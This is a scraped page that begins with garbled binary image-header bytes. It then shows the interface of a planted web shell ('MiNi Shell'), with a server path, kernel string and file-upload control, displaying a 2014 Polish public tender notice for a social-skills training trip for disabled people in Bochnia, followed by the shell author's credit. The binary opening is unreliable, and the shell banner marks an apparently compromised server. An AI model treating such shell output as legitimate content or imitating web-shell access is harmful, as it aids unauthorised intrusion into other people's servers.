JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140624/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140624/135187-N-2014.html

<p class="kh_header"><b>Bochnia: Wyjazdowy trening kompetencji i umiejętności społecznych na siedem dniu dla uczestników projektu oraz osób z otoczenia w ramach realizowanego projektu pn Wzmacnianie integracji społecznej w Powiecie Bocheńskim</b><br>
<b>Numer ogłoszenia: 135187 - 2014; data zamieszczenia: 24.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. G. Windakiewicza 9/5, 32-700 Bochnia, woj. małopolskie, tel. 14 611 97 40, faks 14 611 97 40.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wyjazdowy trening kompetencji i umiejętności społecznych na siedem dniu dla uczestników projektu oraz osób z otoczenia w ramach realizowanego projektu pn Wzmacnianie integracji społecznej w Powiecie Bocheńskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zorganizowanie wyjazdowego treningu kompetencji i umiejętności społecznych w terminie od 4 sierpnia 2014 do 10 sierpnia 2014 r., z zastrzeżeniem, że pobyt rozpoczyna się obiadem i kończy się obiadem, dla uczestników projektu oraz osób z ich otoczenia dla maksymalnie 55 osób, tj. osoby niepełnosprawne w stopniu umiarkowanym i znacznym przede wszystkim z powodu chorób psychicznych, ale także osoby posiadające m.in. dysfunkcję narządu ruchu, choroby neurologiczne oraz układu krążenia, ale także osoby posiadające dysfunkcję narządu wzroku oraz osoby z najbliższego otoczenia, tj: opiekunowie i członkowie rodzin, którzy potrafią zapewnić odpowiednią opiekę i pomoc. Niepełnosprawność uczestników projektu dotyczy głównie zaburzeń emocjonalnych i psychicznych, ale także dysfunkcji somatycznych. Podczas wyjazdowego treningu obecne będą maksymalnie 2 osoby z kadry Zamawiającego. Celem wyjazdowego treningu kompetencji i umiejętności społecznych dla uczestników projektu oraz osób z ich najbliższego otoczenia. Nadrzędnym celem organizacji wyjazdowego treningu kompetencji i umiejętności społecznych jest ukształtowanie kompetencji i umiejętności społecznych ułatwiających integrację społeczną poprzez aktywne formy integracji i pracę socjalną. Cele szczegółowe wyjazdowego treningu kompetencji i umiejętności społecznych: Minimalizowanie skutków izolacji społecznej, Umocnienie właściwej samooceny zyskanej podczas udziału w projekcie, Poprawa samopoczucia psychofizycznego, prawa jakości komunikowania się w grupie, wzrost zaradności życiowej. Program wyjazdowego treningu kompetencji i umiejętności społecznych powinien obejmować: Wykład i warsztaty nt. skutecznych sposobów rozwiązywania konfliktów -10 godzin, Zajęcia z savoir-vivre dotyczące takich sfer życia jak: nakrywanie, podawanie do stołu i konsumpcja, wygląd i ubiór stosowny do okazji, form towarzyskich (np. w miejscu pracy, podczas spotkań towarzyskich, w miejscach użyteczności publicznej), komunikacji (np. telefonicznej)-3 godziny, Konsultacje u wizażystki dla kobiet prowadzone w 3 grupach, każda po 5 godzin-15 godzin. (m.in. z zakresu prawidłowego sposobu wykonywania makijażu, porady dotyczące pielęgnacji cery). Uczestniczki treningu powinny umieć samodzielnie po uzyskaniu wskazówek wykonywać makijaż. Wykład nt. Jak się dogadać. Efektywna komunikacja w rodzinie. Wygrać z wątpliwościami - budowanie poczucia własnej wartości Cele życiowe - własna perspektywa, łącznie 6 godzin, Warsztaty nt. autoprezentacji - 4 godziny, Konsultacje u dietetyka prowadzone w 3 grupach, każda po 5 godzin (m.in. określenie norm zapotrzebowania na energię i składniki odżywcze, wskazanie zasad doboru produktów spożywczych, wskazanie diet stosowanych w żywieniu osób chorych, itp. ), Trening funkcji poznawczych (ćwiczenie skupiania uwagi, pamięci, orientacji oraz funkcji językowych i przestrzennych ) - 3 godziny. Zajęcia na sali gimnastycznej (np. aerobik) lub w plenerze (np. nordic walking) - 7 godzin, Zajęcia rekreacyjno - integracyjne - 15 godzin, w tym Piesze i/lub autokarowe wycieczki, w tym, np. wyjazd na kąpieliska, zwiedzanie miejsc atrakcyjnych turystycznie, korzystanie z dóbr kultury, itp. Ognisko i/lub grill w zależności od warunków atmosferycznych ze wspólnym śpiewaniem przy akompaniamencie instrumentu muzycznego, itp. Gry i zabawy integracyjne (np. szachy), konkursy, quizy itp. Prowadzący zajęcia powinni zapewnić uczestnikom zajęć poczucie bezpieczeństwa, akceptacji oraz przynależności do grupy. Wykonawca odpowiada za zabezpieczenie funkcjonowania zasad życia społecznego w czasie treningu w grupie uczestników, w tym celu mile widziane będzie opracowanie regulaminu właściwego dla programu treningu, który to regulamin potwierdzą podpisem uczestnicy. Treść regulaminu powinna być uzgodniona z Zamawiającym przed dniem rozpoczęcia treningu. Kwestie organizacyjne treningu 7 dniowego: Przewóz uczestników na trasie Bochnia - miejsce organizacji treningu - Bochnia, Wykonawca zapewni przejazd dla maksymalnie 55 osób na trasie z Bochni do miejsca realizacji usługi w dniu 04 sierpnia 2014 r. oraz w dniu 10 sierpnia 2014 r. z miejsca realizacji usługi do Bochni, autokarem, który winien posiadać adekwatną ilość miejsc do ilości uczestników. Autokar powinien posiadać aktualny przegląd techniczny, spełniać warunki dla przewozów turystycznych stosowanych przeciętnie w organizacji wycieczek krajowych. Wykonawca pokryje także koszty ewentualnych opłat parkingowych na postojach, Zakwaterowanie: Obiekt winien być przystosowany do przyjmowania zorganizowanych grup osób niepełnosprawnych wraz z zapleczem rekreacyjno - wypoczynkowym. Ośrodek musi posiadać wpis do rejestru ośrodków, w których mogą odbywać się turnusy rehabilitacyjne, prowadzonego przez właściwego Wojewodę. Organizator zapewni zakwaterowanie osób w 2 - 3 osobowych pokojach, w tym w minimum 17 pokojach 2-osobowych oraz jeden dla kadry Zamawiającego, Każdy pokój musi mieć dostęp do pełnego węzła sanitarnego (wc, umywalka, natrysk z całodobowym dostępem do ciepłej i zimnej wody). Osoby muszą być zakwaterowane w jednym budynku, w pokojach rozmieszczonych blisko siebie. W pokojach powinny znajdować się jednoosobowe łóżka z pościelą (wyklucza się łóżka piętrowe), szafa na ubrania, krzesła/fotele i stolik. Zamawiający nie dopuszcza możliwości zakwaterowania osób różnych płci w tym samym pokoju z wyłączeniem małżeństw oraz rodzeństwa o czym Wykonawca zostanie poinformowany na 2 dni przed terminem realizacji zamówienia. Uczestnicy treningu powinni mieć całodobowy dostęp do kuchni lub aneksu kuchennego, w którym powinny się znajdować się czajnik bezprzewodowy, kubki/szklanki, łyżeczki, kawa, herbata, cukier, cytryna i mleczko w ilości adekwatnej do liczby uczestników treningu uzupełniane w miarę potrzeb przez czas trwania treningu. Wyżywienie. Wykonawca zapewni uczestnikom wyjazdowego treningu całodzienne wyżywienie składające się z 3 posiłków: śniadania, dwudaniowego obiadu wraz z deserem i kolacji. Serwowane posiłki powinny zapewnić dzienne zapotrzebowanie kaloryczne dla 1 osoby, tj. min 2600 - 2800 kcal. Dania powinny być urozmaicone w produkty różnych grup. Każda grupa produktów spożywczych powinna być źródłem cennych dla zdrowia składników odżywczych. Każdy posiłek powinien zawierać warzywa lub owoce. Wyklucza się, aby posiłki podawane były  w formie szwedzkiego stołu. Żywienie powinno odbywać się zgodnie z zasadami racjonalnego żywienia oraz z zachowaniem higieny i obowiązujących uczestników diet (wynikających z posiadanych schorzeń), o których Wykonawca zostanie poinformowany na 1 dzień przed  wyjazdem grupy uczestników. Wykonawca zapewni całodzienne wyżywienie dodatkowo, W tym także wyżywienie w trakcie zajęć/warsztatów zapewni na każde z tych spotkań: świeże ciastka 1kg (wafelki, ciastka kruche), paluszki, 6 litrów soków owocowych (jabłkowy i/lub pomarańczowy), wodę mineralną gazowaną i niegazowaną, kawę rozpuszczalną, herbatę, cukier, śmietankę do kawy (w postaci płynnej), cytryny, owoce oraz w trakcie zajęć rekreacyjno-integracyjnych suchy prowiant oraz napoje. Wykonawca zobowiązany jest zapewnić odpowiednie do podawanych posiłków naczynia i sztućce w ilości adekwatnej do liczby osób biorących udział w zajęciach, wyklucza się możliwość stosowania sztućców plastikowych. Ośrodek powinien posiadać sale do prowadzenia zajęć wykładowo-warsztatowych, które są wyposażone w stoliki i krzesła. Sala gimnastyczna, w której będą odbywać się zajęcia musi znajdować się w budynku, w którym będą zakwaterowani uczestnicy. Wykonawca musi dysponować dwiema salami szkoleniowymi (na terenie ośrodka) przystosowanymi do przeprowadzenia warsztatów/zajęć/spotkań dla uczestników treningu (wyposażona  w odpowiednią liczbę stolików i miejsc siedzących). Ponadto sala powinna być wyposażona w sprawny sprzęt audiowizualny, tj. rzutnik, laptop lub komputer stacjonarny oraz ekran ścienny. Zagwarantowanie całodobowej opieki medycznej, w tym dostępu do psychologa i/lub psychiatry oraz zapewnienie i opłacenie ewentualnego transportu chorego uczestnika do placówki/szpitala. Ubezpieczenie NNW uczestników wyjazdowego treningu na czas przejazdów i pobytu na kwotę 10.000 zł od osoby. Kserokopię dokumentu potwierdzającą ubezpieczenie Wykonawca przedłoży Zamawiającemu wraz z Fakturą po zakończeniu wyjazdowego treningu, Wykonawca w ofercie wskaże osoby, które będą uczestniczyć w realizacji zamówienia oraz wykaże, iż osoby te posiadają aktualne uprawnienia zawodowe w zakresie przedmiotu zamówienia. Zamawiający zastrzega sobie prawo do zmniejszenia liczby uczestników 7-dniowego treningu (w uzasadnionych przypadkach) o 8 osób. O dokładnej liczbie uczestników treningu Zamawiający poinformuje najpóźniej na 2 dni przed planowaną datą realizacji zamówienia. Zamawiający zapłaci za faktyczną liczbę uczestników korzystających z zakwaterowania i wyżywienia. Opłacenie opłaty uzdrowiskowej/miejscowej za wszystkie osoby przebywające na wyjazdowym treningu - jeśli wymagać tego będzie lokalizacja ośrodka. Wykonawca ponosi wyłączną odpowiedzialność za właściwą realizację przedmiotu zamówienia. W celu zapewnienia właściwej promocji realizowanego przez Zamawiającego projektu Wykonawca umieści w obiekcie stosownych informacji. Personel powinien charakteryzować profesjonalizm oraz doświadczenie w przyjmowaniu osób niepełnosprawnych. W ofercie należy wskazać kwalifikacje kadry i odpowiednio przyporządkowane funkcje i zadania zgodnie z programem treningu. Miejsce realizacji zamówienia Miejscowość o walorach krajoznawczych i charakterze wypoczynkowym z możliwością organizacji pieszych wycieczek. Miejsce realizacji treningu powinno znajdować się poza obszarem Powiatu Bocheńskiego, jednakże w odległości nie mniejszej niż 80 km i nie większej niż 300 km od miasta Bochnia. Obiekt wraz z zapleczem rekreacyjno - sportowym, w którym zakwaterowani będą uczestnicy musi być przystosowany do przyjmowania zorganizowanych grup osób niepełnosprawnych.
Wymagania niezbędne względem osób prowadzących trening: psycholog - wykształcenie psychologiczne oraz minimum 2 letnie doświadczenie w wykonywaniu zawodu, pedagog-wykształcenie pedagogiczne oraz minimum 2 letnie doświadczenie w wykonywaniu zawodu, fizjoterapeuta-wykształcenie wyższe magisterskie na kierunku fizjoterapia lub na kierunku rehabilitacja  ruchowa oraz minimum 2 letnie doświadczenie w wykonywaniu zawodu, wizażystka - wykształcenie w zakresie wizażu i/lub kosmetologii, np. ukończeniu szkoły policealnej i/lub kursy/szkolenia/warsztaty specjalistyczne oraz doświadczenie zawodowe w wykonywaniu makijażu oraz innych zabiegów upiększających, dietetyk-wykształcenie średnie medyczne w zawodzie dietetyka i/lub ukończyła studia wyższe na kierunku dietetyka i uzyskała tytuł licencjata lub magistra na tym kierunku, lub rozpoczęła przed dniem 1 października 2007 r. studia wyższe w specjalności dietetyka, obejmujące co najmniej 1784 godziny kształcenia w zakresie dietetyki i uzyskała tytuł licencjata lub magistra na tym kierunku, lub rozpoczęła przed dniem 1 października 2007 r. studia wyższe na kierunku technologia żywności i żywienie człowieka o specjalności żywienie człowieka i uzyskała tytuł licencjata lub magistra lub magistra inżyniera na tym kierunku, lub ukończyła szkołę policealną publiczną lub niepubliczną z uprawnieniami szkoły publicznej i uzyskała dyplom dietetyka, lub rozpoczęła przed 1993 r. szkołę policealną i uzyskała dyplom technika technologii żywienia w specjalności dietetyka oraz posiadanie minimum 2-letniego doświadczenia w zawodzie dietetyka. Dodatkowe wymagania względem Wykonawcy, a w szczególności względem osób prowadzących trening: predyspozycje osobowościowe, komunikatywność, łatwość nawiązywania kontaktów w szczególności z osobami niepełnosprawnymi, wysoka kultura osobista, odpowiedzialność, posiadanie doświadczenia w pracy z osobami niepełnosprawnymi, posiadanie dokumentów potwierdzających doświadczenie w pracy z osobami niepełnosprawnymi.  Wymagane dokumenty: Kserokopie dokumentów potwierdzających wykształcenie osób prowadzących zajęcia, Inne dokumenty o posiadanych kwalifikacjach i doświadczeniu osób prowadzących zajęcia; Oświadczenie o korzystaniu z pełni praw publicznych oraz o niekaralności osoby prowadzącej zajęcia; Oświadczenie o ewentualnym zatrudnieniu w ramach innego projektu, umowy zlecenia osoby wykonującej bezpośrednio usługę; Ewentualne referencje; Wykonawca zobowiązany jest do przedstawienia Zamawiającemu następujące dokumenty: Harmonogram działań. Konspekty zajęć zawierające min.: czas trwania, datę realizacji, metody pracy, imię i nazwisko osoby prowadzącej zajęcia konspekty zajęć zawierające m.in.: temat zajęć, czas trwania, datę realizacji, metody pracy, imię i nazwisko osoby prowadzącej zajęcia konspekt powinien zawierać streszczenie treningu/zajęć /warsztatu wskazujące na związek z celami treningu/zajęć/warsztatu, wskazanie środków, metod, narzędzi użytych do osiągnięcia zakładanego celu programu powinien być powiązany z planowanym wynikiem treningu/zajęć/warsztatu i wprost określać wyniki. Konspekt powinien wskazywać jakie czynności wykonali uczestnicy i jakie czynności wykonał trener, co było przez uczestników poznawane, ćwiczone, przeżywane, doskonalone itp. W celu właściwego określenia celów szczegółowych treningu/zajęć/warsztatu trener musi wziąć pod uwagę poziom wyjściowy uczestników treningu określony w SIWZ i treści określone tematem wskazanym w SIWZ. zdjęcia z wykonania zasadniczych punktów zamówienia zapisane na płycie CD; kserokopia ubezpieczenia uczestników NNW, sprawozdanie zawierające opis realizacji usługi od strony organizacyjnej i merytorycznej przebiegu treningu w poszczególnych punktach programu, ocenę efektów, opis rezultatów, wskazanie w związku z konspektami jakich wyniki zostały osiągnięte przez uczestników, jakie kompetencje i umiejętności zostały zdobyte, odzyskane lub utrwalone, opis wystąpienia ewentualnych nieprzewidzianych zdarzeń itp., wykaz osób realizujących zamówienie wraz z opisem wykształcenia i doświadczenia. Dokumentacja jaką Wykonawca przekażę Zamawiającemu po zrealizowaniu treningu: lista potwierdzająca korzystanie z przewozu, potwierdzenie  korzystania z programu dnia, posiłków i noclegów w trakcie realizacji wyjazdowego treningu kompetencji i umiejętności społecznych konspekty zajęć zawierające m.in.: temat zajęć, czas trwania, datę realizacji, metody pracy, imię i nazwisko osoby prowadzącej zajęcia, zdjęcia z wykonania zasadniczych punktów zamówienia zapisane na płycie CD; kserokopia ubezpieczenia uczestników NNW, Wykonawca będzie zobligowany do znaczenia afiszem promocyjno-informacyjnym miejsca, w którym realizowany będzie trening..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a.	aktualnego odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert
wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a.	wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie

wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie powyższego warunku Zamawiający uzna wykazanie się przez Wykonawcę dysponowaniem miejscem położonym w odległości nie mniejszej niż 80 km i nie większej niż 300 km od miasta Bochnia, przy czym obiekt musi spełniać wymogi określone w opisie przedmiotu zamówienia. w  formie oświadczenia
za spełnienie powyższego warunku Zamawiający uzna wykazanie się przez Wykonawcę dysponowaniem autokarem do przewozu maksymalnie 55 osób 
w formie oświadczenie. 


wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami

wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia

wg formuły spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zaakceptowany wzór umowy ( stanowi załącznik nr 7 do SIWZ) 
Oświadczenie Wykonawcy, że zapoznał się z zakresem zamówienia oraz uzyskał wszelkie niezbędne informacje w celu przygotowania i złożenia oferty z należytą starannością.
oświadczenie Wykonawcy o dysponowaniu miejscem położonym w odległości nie mniejszej niż 80 km i nie większej niż 300 km od miasta Bochnia, przy czym obiekt musi spełniać wymogi określone w opisie przedmiotu zamówienia
Oświadczenie Wykonawcy o dysponowaniu autokarem do przewozu maksymalnie 55 osób</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.malopolska.pl/pcprwbochni/Article/id,254976.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Bochni
ul. Windakiewicza 9/5
32-700 Bochnia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.07.2014 godzina 11:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Bochni 
ul. Windakiewicza 9/5
32-700 Bochnia.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt pn Wzmacnianie integracji społecznej w Powiecie Bocheńskim.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com